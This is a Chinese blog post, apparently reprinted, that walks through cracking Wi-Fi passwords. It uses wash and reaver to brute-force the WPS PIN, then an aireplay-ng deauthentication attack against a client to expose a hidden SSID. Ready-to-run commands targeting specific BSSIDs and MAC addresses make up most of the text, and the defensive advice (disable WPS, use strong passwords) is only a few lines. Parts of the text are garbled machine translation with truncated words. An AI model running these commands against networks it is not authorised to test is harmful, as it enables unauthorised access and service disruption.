来自Wikipeida:
Wi-Fi保护设置(简称WPS,简称Wi-Fi保护设置)是一种无线网络安全标准,旨在简化家庭用户使用无线网络时的加密步骤。该标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。
2011年12月28日,安全专家Stefan Viehbock报告了此标准中的一个主要安全漏洞。此漏洞使远程攻击者可以在数小时内使用蛮力攻击来获取WPS PIN和WPA / WPA2 PSK。码。一些新生产的路默认情况下启用WPS功能,因此,尽管某些无线设备上无法关闭此功能,但现在建议用户关闭无线路由器上的WPS一键加密功能。
WPS的目的是简化用户输入密码的步骤;当设备连接到wifi并需要输入密码时,只需按无线路由器上的wps按钮即可。
Reaver是除字典破解之外的另一个选择
如果无线路由器已打开WPS,则无需使用上述破解方法。
WPS的密码未加密。 Reaver将强行使用密码,如果找到密码,则查找密码。通常,它花费的时间不短。
注意:
执行Kali Linux并使用Aircrack破解wifi密码(wpa / wpa2)中的前三个步骤,打开无线网卡的监视模式。
3)查找启用了WPS的无线路由器
我们不会一一测试,而是使用wash命令。
# wash -i wlan0mon -C
如果没有任何内容,则表示没有启用WPS的无线路由器。记住要破解wifi的BSSID。
4)开始破解密码

# reaver -i wlan0mon -b C8:3A:35:30:3E:C8 -vv -a
等待2-10小时:
最后,别忘了结束无线网卡的监视模式:
# airmon-ng stop wlan0mon
摘要
如果不需要此功能,请将其关闭。
一个小实验:
我看到有人说隐藏SSID会使wifi更难以破解,因此我将对其进行测试。
隐藏SSID是为了防止他人搜索您老板的AP。请注意,在这种情况下,连接wifi时必须手动输入AP名称。

仅看到长度12,没有ap名称。
# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan0mon
# aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
破解密码的方法保持不变;您可以使用上述两个命令轻松获得ap名称。
事实证明,隐藏SSID无关紧要;实际上,设置复杂的密码比隐藏SSID更有用。
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/shumachanpin/article-342532-1.html
包装都啥时候的了